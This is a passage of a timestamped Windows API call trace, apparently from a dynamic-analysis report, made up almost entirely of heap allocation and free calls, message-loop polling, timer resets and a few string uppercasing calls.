(HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa610 [0254.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0254.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0254.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0254.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0254.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0254.278] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa970 | out: hHeap=0x25c0000) returned 1 [0254.278] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa970 [0254.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0254.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0254.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0254.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0254.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0254.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0254.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7a8 [0254.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0254.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0254.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0254.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0254.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0254.279] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0254.279] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0254.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0254.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0254.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0254.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0254.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0254.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6d0 | out: hHeap=0x25c0000) returned 1 [0254.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6d0 [0254.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0254.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa280 [0254.280] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b2ce8 [0254.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa280 | out: hHeap=0x25c0000) returned 1 [0254.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2ce8 | out: hHeap=0x25c0000) returned 1 [0254.280] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa418 | out: hHeap=0x25c0000) returned 1 [0254.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0254.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b10b8 | out: hHeap=0x25c0000) returned 1 [0254.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0254.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1798 | out: hHeap=0x25c0000) returned 1 [0254.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0254.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0254.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8f8 | out: hHeap=0x25c0000) returned 1 [0254.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0254.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0254.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0254.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa328 | out: hHeap=0x25c0000) returned 1 [0254.281] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa400 | out: hHeap=0x25c0000) returned 1 [0254.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0254.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0254.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0254.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0254.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0254.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0254.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0254.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa958 | out: hHeap=0x25c0000) returned 1 [0254.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0254.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0254.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab08 | out: hHeap=0x25c0000) returned 1 [0254.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0254.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaac0 | out: hHeap=0x25c0000) returned 1 [0254.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa9d0 | out: hHeap=0x25c0000) returned 1 [0254.282] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0254.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa868 | out: hHeap=0x25c0000) returned 1 [0254.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0254.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0254.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0254.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0254.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa18 | out: hHeap=0x25c0000) returned 1 [0254.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0254.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f200 | out: hHeap=0x25c0000) returned 1 [0254.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466dd0 | out: hHeap=0x25c0000) returned 1 [0254.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0254.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0254.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0254.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0254.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.283] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0254.283] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a0288 [0254.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0254.284] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 1 [0254.284] TranslateMessage (lpMsg=0x8bf3c0) returned 0 [0254.284] DispatchMessageW (lpMsg=0x8bf3c0) returned 0x0 [0254.284] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0254.284] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0254.284] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0254.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0254.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c38 [0254.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0254.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18a8 [0254.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0254.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0254.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b17b8 [0254.284] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0254.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0254.284] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0254.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0254.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0254.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18a8 | out: hHeap=0x25c0000) returned 1 [0254.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c38 | out: hHeap=0x25c0000) returned 1 [0254.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0254.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0254.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d8a0 [0254.285] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0254.285] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0254.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0254.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa748 [0254.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0254.285] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6e8 [0254.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0254.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6e8 | out: hHeap=0x25c0000) returned 1 [0254.285] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa748 | out: hHeap=0x25c0000) returned 1 [0254.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0254.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0254.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0254.286] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0254.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0254.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0254.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa538 [0254.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0254.286] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0254.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0254.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa340 | out: hHeap=0x25c0000) returned 1 [0254.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa538 | out: hHeap=0x25c0000) returned 1 [0254.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0254.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.286] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0254.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0254.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0254.287] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0254.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0254.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0254.287] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0254.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0254.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0254.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0254.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0254.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa430 [0254.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0254.287] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4c0 [0254.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4c0 | out: hHeap=0x25c0000) returned 1 [0254.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0254.287] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0254.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466df0 | out: hHeap=0x25c0000) returned 1 [0254.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0254.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7c0 [0254.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa430 [0254.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa4c0 [0254.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa538 [0254.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa340 [0254.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa748 [0254.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0254.288] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7c0 | out: hHeap=0x25c0000) returned 1 [0254.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa7c0 [0254.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa6e8 [0254.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaa18 [0254.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0254.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa598 [0254.288] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d8e8 [0254.289] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0254.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa868 [0254.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0254.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa9d0 [0254.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaac0 [0254.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0254.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aab08 [0254.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aaaf0 [0254.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa478 [0254.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa958 [0254.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa778 [0254.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa5f8 [0254.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0254.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0254.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0254.289] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b16c8 [0254.289] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0254.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0254.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0xc) returned 0x34aa3d0 [0254.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x40) returned 0x248d930 [0254.290] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0254.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0254.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0254.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0254.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0254.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0254.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0254.290] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0254.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0254.290] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6c60 [0254.291] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0254.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6c60 | out: hHeap=0x25c0000) returned 1 [0254.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0254.291] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0254.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0254.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0254.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.292] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.292] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d7a0 [0254.292] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0254.293] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7a0 | out: hHeap=0x25c0000) returned 1 [0254.293] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0254.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16c8 [0254.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c48 [0254.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0254.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0254.293] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1708 [0254.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa988 [0254.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0254.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa988 | out: hHeap=0x25c0000) returned 1 [0254.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab20 | out: hHeap=0x25c0000) returned 1 [0254.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0254.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c48 | out: hHeap=0x25c0000) returned 1 [0254.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0254.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0254.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0254.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0254.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa3d0 [0254.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b18c8 [0254.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa448 [0254.294] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18c8 | out: hHeap=0x25c0000) returned 1 [0254.294] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aab20 [0254.294] RtlAllocateHeap 